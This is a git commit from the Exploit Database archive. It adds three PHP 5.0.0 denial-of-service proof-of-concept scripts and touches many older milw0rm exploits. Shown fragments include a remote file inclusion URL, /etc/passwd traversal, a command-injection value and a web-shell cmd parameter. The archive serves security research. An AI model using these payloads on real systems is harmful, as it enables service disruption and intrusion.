DB: 2016-08-31

3 new exploits

Too many to list!
This commit is contained in:
Offensive Security 2016-08-31 05:07:37 +00:00
parent 760d823bc8
commit 1f0c845486
35 changed files with 7863 additions and 7793 deletions

15437
files.csv

File diff suppressed because it is too large Load diff

View file

@ -295,3 +295,4 @@ xpl=substr(xpl,atom,len(xpl))
"""
# milw0rm.com [2006-07-21]

View file

@ -106,3 +106,4 @@ int main(void)
}
// milw0rm.com [2006-07-18]

View file

@ -85,3 +85,4 @@ system(cmd)
sock.close
# milw0rm.com [2006-07-21]

15
platforms/php/dos/40313.php Executable file
View file

@ -0,0 +1,15 @@
<?php
#############################################################################
## PHP 5.0.0 imap_mail() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("imap")) die("You need imap extension loaded!");
$str = str_repeat('A', 9999);
imap_mail($str,'','');
?>

14
platforms/php/dos/40314.php Executable file
View file

@ -0,0 +1,14 @@
<?php
#############################################################################
## PHP 5.0.0 hw_docbyanchor() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");
hw_docbyanchor(0,0);
?>

15
platforms/php/dos/40315.php Executable file
View file

@ -0,0 +1,15 @@
<?php
#############################################################################
## PHP 5.0.0 html_doc_file() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");
$str = str_repeat('A', 9999);
html_doc_file($str);
?>

View file

@ -249,3 +249,4 @@ for ($k=0;$k<=$#ARR;$k++)
#========================================================================================================
# milw0rm.com [2006-07-18]

View file

@ -137,3 +137,4 @@ echo "Exploit failed...";
?>
# milw0rm.com [2006-07-18]

View file

@ -146,3 +146,4 @@ echo "exploit failed...";
?>
# milw0rm.com [2006-07-21]

View file

@ -217,3 +217,4 @@ else
?>
# milw0rm.com [2006-07-24]

View file

@ -258,3 +258,4 @@ echo "----------------------------------------------------------\n";
?>
# milw0rm.com [2006-07-30]

View file

@ -22,3 +22,4 @@
##############################################################################
# milw0rm.com [2006-07-31]

View file

@ -53,3 +53,4 @@ EAR.php/&cmd=ls
+-------------------------[ E O F ]----------------------------------
# milw0rm.com [2006-07-31]

View file

@ -45,3 +45,4 @@
+-------------------------[ E O F ]----------------------------------
# milw0rm.com [2006-08-01]

View file

@ -46,3 +46,4 @@
+-------------------------[ E O F ]----------------------------------
# milw0rm.com [2006-08-01]

View file

@ -36,3 +36,4 @@
=================================================================
# milw0rm.com [2006-08-01]

View file

@ -17,3 +17,4 @@ document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"u
</script>
# milw0rm.com [2006-08-02]

View file

@ -23,3 +23,4 @@ POC:
http://hax.com/tsep/include/colorswitch.php?tsep_config[absPath]=http://remotefile/?
# milw0rm.com [2006-08-02]

View file

@ -306,3 +306,4 @@ else echo ("specify an action [1-4]...");
?>
# milw0rm.com [2006-08-03]

View file

@ -260,3 +260,4 @@ echo "exploit failed...";
?>
# milw0rm.com [2006-08-07]

View file

@ -19,3 +19,4 @@ SirDarckCat
elhacker.net
# milw0rm.com [2006-08-07]

View file

@ -28,3 +28,4 @@ http://www.site.com/[sapidcms_path]/usr/extensions/get_tree.inc.php?GLOBALS[root
#Pozdro dla wszystkich ;-)
# milw0rm.com [2006-08-07]

View file

@ -115,3 +115,4 @@ The attacker can now log as superlibrarian.
Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link.
Alice needs to have access to the OPAC interface and to have permissions to create public lists.

View file

@ -16,3 +16,4 @@ http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv
# milw0rm.com [2008-10-12]

View file

@ -36,3 +36,4 @@ do
} while (true);
# milw0rm.com [2006-07-20]

View file

@ -272,3 +272,4 @@ void std_err(void) {
}
// milw0rm.com [2006-07-31]